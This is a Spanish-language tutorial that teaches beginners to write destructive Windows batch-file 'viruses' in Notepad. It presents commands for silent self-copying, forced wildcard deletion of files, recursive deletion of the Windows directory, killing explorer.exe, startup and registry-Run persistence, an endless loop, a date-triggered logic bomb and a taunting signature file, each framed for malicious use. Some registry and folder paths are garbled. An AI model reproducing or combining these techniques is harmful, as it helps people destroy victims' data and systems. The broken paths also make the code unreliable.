Tutorial para la creacion de virus en 5 minutos solo el block de notas

Tutorial para la creacion de virus en 5 minutos y con solo el block de notas

ADVERTENCIAUSA ESTOS CODIGOS BAJO TU RESPONSABILIDAD, PUEDES ESTAR EN PROBLEMAS SI ABUSAS DE ELLOS.CON ESTOS SIMPLES CODIGOS PUEDES CREAR MALWARE PODEROSISIMOS, QUE PUEDEN ASESINAR A TU COMPUTADORA, ¡CUIDADO!¿Qué NECESITAMOS?Para programar nuestros primeros virus, no es necesario contar con algún conocimiento en algún tipo de programación como c++ o java, simplemente se necesita el block de notas, RECUERDA guardar tus archivos con la extensión *.bat de lo contrario solo crearas txts que no sirven de nadaLo primero que vamos a aprender, son comentarios, los comentarios van después del símbolo ::, veamos:::esto no se tomara en cuenta para la ejecución del código...::solo son comentariosAhora que ya sabes que son los comentarios, comencemos.

DESACTIVAR EL ECO

Cada comando que está en el bat es mostrado en pantalla, para desactivar esto, debes utilizar el comando @echo off. Ejemplo:echo hola::si te fijas se mostrara aparte de hola, la instruccion...pause > nul::el pause es para pausar la ejecucion del batch hasta que se presioneuna tecla...@echo offecho hola:: solo se mostrara hola pause > nulexit

MANIPULAR ARCHIVOS

Copiar archivos
Para copiar un archivo, se usa el comando copy, y como parámetros, primero el archivo a copiar seguido de espacio y luego la ruta de destino, es importante que las rutas vayan entre comillas, veamos un ejemplo:Copy "c:\ruta\de\origen.txt" "e:\ruta\de\destino.bat"Si te fijas en el ejemplo, nosotros copiamos el archivo origen.txt y lo copiamos a otra ruta cambiándolo a bat, es importante señalar que puedes copiar cualquier tipo de archivo con este comando...Como a nosotros nos interesa el lado malicioso, vamos a ver de qué modo puede beneficiar esto a nuestro virus, entonces, el comando copy, puede ir acompañado de /y, que indica que el archivo de destino, si ya existe, se sobrescribirá silenciosamente y sin confirmación:Copy /y "c:\ruta\de\origen.txt" "e:\ruta\de\destino.bat"::en este caso, si el archivo destino.bat existe, se sobrescribirá y::no pedirá ningún tipo de confirmación.Bueno, ya sabes copiar archivos, pero, ¿cómo saber nuestra ruta?, seguramente estarás pensando en que tu virus se copie a sí mismo en otro directorio, pero para esto deberías saber el nombre de tu virus junto con su ruta, pero, ¡NO TE PREOCUPES! Para lograr autocopiarnos se debe reemplazar en donde se pone la ruta de origen por los comandos %0 , eso es el valor de la ruta actual.Copy /y %0 "c:\destino.bat"::esto nos replicara en c:\destino.bat...

Borrar archivos

Uno de los principales comandos para todo malware es borrar archivos, el comando para realizar esto es Del...se utiliza tipeando Del seguido de espacio y luego la ruta del archivo a borrar entrecomillas...Del "c:\archivo a borrar.exe"Este comando puede borrar cualquier tipo de archivo...si quieres asegurarte de que el archivo desaparezca, le agregas el parámetro /f, que forzara el borrado...Del /f "c:\archivo a borrar.exe"Ahora vamos al lado viral, para que no nos pida confirmación al borrar, le agregamos el parámetro /q y así lo borrara de modo silencioso...Del /q "c:\a.exe"::si te fijas borraras el archivo silenciosamente, pero no lo::forzaras...Del /f /q "c:\b.txt"::ahí si se borrara siempre...claro que no debe estar en uso.También con este comando, son admitidos los comodines, el comando asterisco, representa parte del nombre...del /f /q c:\*woo*::en la carpeta c:\, borrara todos los archivos que contengan la palabra woo...:: Por ejemplo awoos, swoo, asdasdasdwoo, wooasdasda, etc...del /f /q c:\*dd::este borrara solo los archivos que finalicen con dd...del /f /q c:\*.txt:: borrara todos los txts...
Borrar Carpetas

Otra cosa importante en nuestro virus es borrar carpetas, utilizaremos entonces el comando rd (remove directory), se utiliza parecido que al comando del, pero solo utiliza los parámetros /s y /q.... /s quita todos los archivos y carpetas del directorio y /q lo hace sin confirmación y silenciosamente...rd "c:\windows"::uuhhh, q pasaría rd /s /q "c:\windows"::qda mejor no?...= no se borrara...

Crear directorios

Cuando nuestro virus se quiera copiar a una carpeta, y esta no existe, se creara un error y no se copiara, para evitar esto, podemos verificar si el directorio existe que se copie, si no, que cree el directorio y luego se copie.El comando para esto es mkdir o md...mkdir "c:\caca"md "c:\wooo"::esto creara ambos directorios, ya q los dos sirven para lo mismo

Comprobar si existe

Para la creación de nuestro virus, podemos comprobar si existe el archivo o carpeta que queramos modificar, borrar, etc. ...y si existe nuestra acción sucede...esto se combina con etiquetas, como siempre, las rutas van entre comillas...if exist "C:\archivo.exe" (goto 1) else goto 2:1::aquí va la acción del virus, nótese q el 1 es la etiqueta...Del /f /q "C:\archivo.exe":2exit

PROCESOS

Matar procesos
Para matar procesos se utiliza el comando taskkill, es útil siempre matar procesos, ya que si algún archivo esta en uso, no se puede borrar, entonces, para esto matamos el proceso del archivo y luego lo borramos. El taskkill se utiliza seguido de la expresión /im, y luego el nombre del ejecutable entre comillas....taskkill /f /im "explorer.exe"::esto finalizara el proceso explorer sin pedir confirmación, gracias al /f::supongamos q el archivo hola.exe esta en uso y no lo podemos borrar...taskkill /f /im "hola.exe"Del /f /q "c:\archivos de programas/hola.exe"::, ya ha desaparecido el archivo hola.exe

Ver procesos

Para ver la lista de procesos, simplemente tipea esto en la consola y veras todos los procesos activos...tasklist

INICIARSE CON WINDOWS

Esta, es una de las funciones más importantes en todo virus, y existen dos métodos para hacerlo:

Iniciarse por startup

En Windows, hay una carpeta en donde hay accesos directos a programas que se inicien con Windows, si copiamos nuestro bat a esta, también se iniciara con windows...Copy %0 C:\"Documents and Settings"\"All Users"\*Inicio\"Programas"\"Inicio"\"mivirus.bat": :, esa es la mágica carpeta...

Agregarse al registro

Este es el modo más seguro, solo hay q agregarse a la entrada run del registro, creando una clave que contenga el nombre de la ruta y además un nombre que se mostrara en el registro:reg add "HKLM\Software\Microsoft\Windows\CurrentVersio n\Ru n" /v"UNNOMBREQUESEMOSTRARA" /d "c:\tubat.bat"::reg add es para agregar la clave::HKLM\Software\Microsoft\Windows\CurrentVers ion\R un es la entradamagica donde estan todos los programas q se inician cn windows...::/v indica el nombre del valor::/d indica los datos que seran agregados

VARIABLES GLOBALES

Las variables globales nos sirven para que nuestro virus funcione, también en Windows que no esté instalado en el directorio por defecto, aquí dejo algunas...%systemroot% = directorio de windows, por defecto c:\windows%programfiles% = los archivos de programa, por defecto c:\archivos de programa%username% = el nombre de usuario%allusersprofile% = por defecto c:\documents and setting\all users%computername% = el nombre de la maqina...Ejemplo de cómo utilizarlas:Copy %0 %systemroot%\mivirus.bat::copiara el virus en el directorio de windows...echo %username%::te mostrara el nombre de usuario, en mi caso matias ::las variables globales siempre deben estar entre %%Si quieres conocer todas las variables globales, tipea set en la consola...SetRECUERDA QUE SIEMPRE VAN ENTRE %%

LOOPS

Esto es muy fácil y es mas que nada lógica, se utiliza una etiqueta y luego el goto para volver a la etiqueta...Esto lo puedes utilizar para lo que quieras, mas q nada para molestar, no se quitara la ventanitaNunca.: esto es un loop:woOo::woOo es nuestra etiqetacopy%0 "c:\bat.bat"::hacemos lo q qramos...goto woOo::y volvemos al woOo...::asi estamos todo el rato haciendo lo mismo...

BOMBA LÓGICA

Bueno para hacer que realice las acciones que nosotros queramos en una determinada fecha, utilizaremos la variable %date%, que nos devuelve la fecha del sistema, entonces nosotros verificamos si la fecha es correcta y vamos a una etiqueta, si no, vamos a otra...echo %date%::si nos fijamos nos devuelve 01-02-2009::entonces con esto sacamos por teoria que...if %date% == 01-02-09 (goto 1) else goto 2:1::codigo del virus:2Exit

CREAR TXT

Siempre los txts son un buen payload, para crear un txt, se debe re direccionar la salida con el comando >. Entonces podemos perfectamente dejar la firma en un txt gracias a este comando. Para sobrescribir y crear un archivo, utiliza el comando > y para sobrescribir el comando >>.echo te mate el pc...>c:\firma.txtecho y no sabes quien soy>>c:\firma.txtecho I'm The Shredder>>c:\firma.txtecho ups, ya sabes >>c:\firma.txtecho saludoss>>c:\firma.txt